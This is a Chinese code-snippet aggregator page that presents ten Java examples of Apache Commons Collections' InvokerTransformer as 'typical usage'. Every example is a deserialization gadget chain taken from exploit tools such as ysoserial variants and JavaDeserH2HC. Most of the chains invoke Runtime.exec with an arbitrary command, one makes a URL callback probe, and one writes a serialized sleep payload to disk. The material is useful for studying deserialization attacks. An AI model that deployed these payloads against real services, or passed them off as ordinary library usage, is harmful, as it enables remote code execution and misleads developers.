本文整理汇总了Java中org.apache.commons.collections.functors.InvokerTransformer类的典型用法代码示例。如果您正苦于以下问题:Java InvokerTransformer类的具体用法?Java InvokerTransformer怎么用?Java InvokerTransformer使用的例子?那么恭喜您, 这里精选的类代码示例或许可以为您提供帮助。
InvokerTransformer类属于org.apache.commons.collections.functors包,在下文中一共展示了InvokerTransformer类的10个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Java代码示例。
示例1: Reverse_Payload
import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
public static Object Reverse_Payload() throws Exception {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
new Object[]{"getRuntime", new Class[0]}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}),
new InvokerTransformer("exec", new Class[]{String.class},
new Object[]{"calc.exe"})};
Transformer transformerChain = new ChainedTransformer(transformers);
Map pocMap = new HashMap();
pocMap.put("value", "value");
Map outmap = TransformedMap.decorate(pocMap, null, transformerChain);
//通过反射获得AnnotationInvocationHandler类对象
Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
//通过反射获得cls的构造函数
Constructor ctor = cls.getDeclaredConstructor(Class.class, Map.class);
//这里需要设置Accessible为true,否则序列化失败
ctor.setAccessible(true);
//通过newInstance()方法实例化对象
Object instance = ctor.newInstance(Retention.class, outmap);
return instance;
}
开发者ID:yrzx404,项目名称:interview-question-code,代码行数:25,代码来源:App.java
示例2: getObject
import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
public BadAttributeValueExpException getObject(final String command) throws Exception {
final String[] execArgs = new String[] { command };
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(
new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String.class }, execArgs),
new ConstantTransformer(1) };
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
BadAttributeValueExpException val = new BadAttributeValueExpException(null);
Field valfield = val.getClass().getDeclaredField("val");
valfield.setAccessible(true);
valfield.set(val, entry);
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
return val;
}
开发者ID:hucheat,项目名称:APacheSynapseSimplePOC,代码行数:34,代码来源:CommonsCollections5.java
示例3: getObject
import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
public InvocationHandler getObject(final String command) throws Exception {
final String[] execArgs = new String[] { command };
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(
new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String.class }, execArgs),
new ConstantTransformer(1) };
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
return handler;
}
开发者ID:hucheat,项目名称:APacheSynapseSimplePOC,代码行数:31,代码来源:CommonsCollections1.java
示例4: main
import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
@SuppressWarnings ( {"unchecked"} )
public static void main(String[] args)
throws ClassNotFoundException, NoSuchMethodException, InstantiationException,
IllegalAccessException, IllegalArgumentException, InvocationTargetException {
String cmd[] = {"/bin/sh", "-c", "touch /tmp/h2hc_lazymap"}; // Comando a ser executado
Transformer[] transformers = new Transformer[] {
// retorna Class Runtime.class
new ConstantTransformer(Runtime.class),
// 1o. Objeto InvokerTransformer: .getMethod("getRuntime", new Class[0])
new InvokerTransformer(
"getMethod", // invoca método getMethod
( new Class[] {String.class, Class[].class } ),// tipos dos parâmetros: (String, Class[])
( new Object[] {"getRuntime", new Class[0] } ) // parâmetros: (getRuntime, Class[0])
),
// 2o. Objeto InvokerTransformer: .invoke(null, new Object[0])
new InvokerTransformer(
"invoke", // invoca método: invoke
(new Class[] {Object.class, Object[].class }),// tipos dos parâmetros: (Object.class, Object[])
(new Object[] {null, new Object[0] }) // parâmetros: (null, new Object[0])
),
// 3o. Objeto InvokerTransformer: .exec(cmd[])
new InvokerTransformer(
"exec", // invoca método: exec
new Class[] { String[].class }, // tipos dos parâmetros: (String[])
new Object[]{ cmd } ) // parâmetros: (cmd[])
};
// Cria o objeto ChainedTransformer com o array de Transformers:
Transformer transformerChain = new ChainedTransformer(transformers);
// Cria o map
Map map = new HashMap();
// Decora o map com o LazyMap e a cadeia de transformações como factory
Map lazyMap = LazyMap.decorate(map,transformerChain);
lazyMap.get("h2hc2"); // Tenta recuperar uma chave inexistente (BUM)
}
开发者ID:joaomatosf,项目名称:JavaDeserH2HC,代码行数:40,代码来源:ExampleTransformersWithLazyMap.java
示例5: getObject
import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
public BadAttributeValueExpException getObject(CmdExecuteHelper cmdHelper) throws Exception {
final String[] execArgs = cmdHelper.getCommandArray();
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(
new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String[].class }, new Object[]{execArgs}),
new ConstantTransformer(1) };
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
BadAttributeValueExpException val = new BadAttributeValueExpException(null);
Field valfield = val.getClass().getDeclaredField("val");
valfield.setAccessible(true);
valfield.set(val, entry);
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
return val;
}
开发者ID:pimps,项目名称:ysoserial-modified,代码行数:35,代码来源:CommonsCollections5.java
示例6: getObject
import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
public InvocationHandler getObject(CmdExecuteHelper cmdHelper) throws Exception {
final String[] execArgs = cmdHelper.getCommandArray();
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(
new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String[].class }, new Object[]{execArgs}),
new ConstantTransformer(1) };
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
return handler;
}
开发者ID:pimps,项目名称:ysoserial-modified,代码行数:32,代码来源:CommonsCollections1.java
示例7: getObject
import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
public InvocationHandler getObject(final String command) throws Exception {
final String[] execArgs = new String[] { command };
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(
new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String.class }, execArgs),
new ConstantTransformer(1) };
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
return handler;
}
开发者ID:NetSPI,项目名称:JavaSerialKiller,代码行数:31,代码来源:CommonsCollections1.java
示例8: getObject
import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
public InvocationHandler getObject(final String command) throws Exception {
final String[] execArgs = new String[] { command };
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(
new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String.class }, execArgs),
new ConstantTransformer(1) };
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
return handler;
}
开发者ID:njfox,项目名称:Java-Deserialization-Exploit,代码行数:31,代码来源:CommonsCollections1.java
示例9: main
import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
@SuppressWarnings ( {"unchecked"} )
public static void main(String[] args)
throws ClassNotFoundException, NoSuchMethodException, InstantiationException,
IllegalAccessException, IllegalArgumentException, InvocationTargetException, IOException {
String url = args[0];
// Cria array de transformers que resulta na seguinte construção:
// new URL(url).openConnection().getInputStream().read();
Transformer[] transformers = new Transformer[] {
new ConstantTransformer(new URL(url)),
new InvokerTransformer("openConnection", new Class[] { }, new Object[] {}),
new InvokerTransformer("getInputStream", new Class[] { }, new Object[] {}),
new InvokerTransformer("read", new Class[] {}, new Object[] {})
};
// Cria o objeto ChainedTransformer com o array de Transformers:
Transformer transformerChain = new ChainedTransformer(transformers);
// Cria o map
Map map = new HashMap();
// Decora o map com o LazyMap e a cadeia de transformações como factory
Map lazyMap = LazyMap.decorate(map,transformerChain);
// Usa reflexão para obter referencia da classe AnnotationInvocationHandler
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
// Obtem construtor da AnnotationInvocationHandler que recebe um tipo (class) e um Map
Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
// Torna o construtor acessível
ctor.setAccessible(true);
// Obtem/Cria instancia do AnnotationInvocationHandler, fornecendo (via construtor) um Retetion.class (que eh um
// type Annotation, requerido pelo construtor) e atribui o LazyMap (contendo a cadeia de Transformers) ao campo
// memberValues. Assim, ao tentar obter uma chave inexiste deste campo, a cadeia será "executada"!
InvocationHandler handlerLazyMap = (InvocationHandler) ctor.newInstance(Retention.class, lazyMap);
//criado a interface map
Class[] interfaces = new Class[] {java.util.Map.class};
// cria o Proxy "entre" a interface Map e o AnnotationInvocationHandler anterior (que contém o lazymap+transformers)
Map proxyMap = (Map) Proxy.newProxyInstance(null, interfaces, handlerLazyMap);
// cria outro AnnotationInvocationHandler atribui o Proxy ao campo memberValues
// esse Proxy será "acionado" no magic method readObject e, assim, desviará o fluxo para o
// método invoke() do primeiro AnnotationInvocationHandler criado (que contém o LazyMap+Transformers)
InvocationHandler handlerProxy = (InvocationHandler) ctor.newInstance(Retention.class, proxyMap);
// Serializa o objeto "handlerProxy" e o salva em arquivo. Ao ser desserializado,
// o readObject irá executar um map.entrySet() e, assim, desviar o fluxo para o invoke().
// No invoke(), uma chave inexistente será buscada no campo "memberValues" (que contém um LazyMap
// com a cadeia de Transformers), o que deverá acionar o Thread.sleep(10000)!
System.out.println("Saving serialized object in SleepExample.ser");
FileOutputStream fos = new FileOutputStream("SleepExample.ser");
ObjectOutputStream oos = new ObjectOutputStream(fos);
oos.writeObject(handlerProxy);
oos.flush();
}
开发者ID:joaomatosf,项目名称:JavaDeserH2HC,代码行数:55,代码来源:DnsWithCommonsCollections.java
示例10: main
import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
@SuppressWarnings ( {"unchecked"} )
public static void main(String[] args)
throws ClassNotFoundException, NoSuchMethodException, InstantiationException,
IllegalAccessException, IllegalArgumentException, InvocationTargetException, IOException {
// Cria array de Transformers que irá resultar na seguinte construção:
//Thread.class.getMethod("sleep", new Class[]{Long.TYPE}).invoke(null, new Object[]{10000L});
Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Thread.class), // retorna class Thread.class
// 1o. Objeto InvokerTransformer: getMethod("sleep", new Class[]{Long.TYPE})
new InvokerTransformer(
"getMethod", // invoca método getMethod
( new Class[] {String.class, Class[].class } ), // tipos dos parâmetros: (String, Class[])
( new Object[] {"sleep", new Class[]{Long.TYPE} } ) // parâmetros: (sleep, new Class[]{Long.TYPE})
),
// 2o. Objeto InvokerTransformer: invoke(null, new Object[]{10000L})
new InvokerTransformer(
"invoke", // invoca método: invoke
(new Class[] {Object.class, Object[].class }),// tipos dos parâmetros: (Object.class, Object[])
(new Object[] {null, new Object[] {10000L} }) // parâmetros: (null, new Object[] {10000L})
)
};
// Cria o objeto ChainedTransformer com o array de Transformers:
Transformer transformerChain = new ChainedTransformer(transformers);
// Cria o map
Map map = new HashMap();
// Decora o map com o LazyMap e a cadeia de transformações como factory
Map lazyMap = LazyMap.decorate(map,transformerChain);
// Usa reflexão para obter referencia da classe AnnotationInvocationHandler
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
// Obtem construtor da AnnotationInvocationHandler que recebe um tipo (class) e um Map
Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
// Torna o construtor acessível
ctor.setAccessible(true);
// Obtem/Cria instancia do AnnotationInvocationHandler, fornecendo (via construtor) um Retetion.class (que eh um
// type Annotation, requerido pelo construtor) e atribui o LazyMap (contendo a cadeia de Transformers) ao campo
// memberValues. Assim, ao tentar obter uma chave inexiste deste campo, a cadeia será "executada"!
InvocationHandler handlerLazyMap = (InvocationHandler) ctor.newInstance(Retention.class, lazyMap);
//cria a interface map
Class[] interfaces = new Class[] {java.util.Map.class};
// cria o Proxy "entre" a interface Map e o AnnotationInvocationHandler anterior (que contém o lazymap+transformers)
Map proxyMap = (Map) Proxy.newProxyInstance(null, interfaces, handlerLazyMap);
// cria outro AnnotationInvocationHandler atribui o Proxy ao campo memberValues
// esse Proxy será "acionado" no magic method readObject e, assim, desviará o fluxo para o
// método invoke() do primeiro AnnotationInvocationHandler criado (que contém o LazyMap+Transformers)
InvocationHandler handlerProxy = (InvocationHandler) ctor.newInstance(Retention.class, proxyMap);
// Serializa o objeto "handlerProxy" e o salva em arquivo. Ao ser desserializado,
// o readObject irá executar um map.entrySet() e, assim, desviar o fluxo para o invoke().
// No invoke(), uma chave inexistente será buscada no campo "memberValues" (que contém um LazyMap
// com a cadeia de Transformers), o que deverá acionar o Thread.sleep(10000)!
System.out.println("Saving serialized object in SleepExample.ser");
FileOutputStream fos = new FileOutputStream("SleepExample.ser");
ObjectOutputStream oos = new ObjectOutputStream(fos);
oos.writeObject(handlerProxy);
oos.flush();
}
开发者ID:joaomatosf,项目名称:JavaDeserH2HC,代码行数:63,代码来源:SleepExample.java
注:本文中的org.apache.commons.collections.functors.InvokerTransformer类示例整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。 |
客服电话
APP下载
官方微信
请发表评论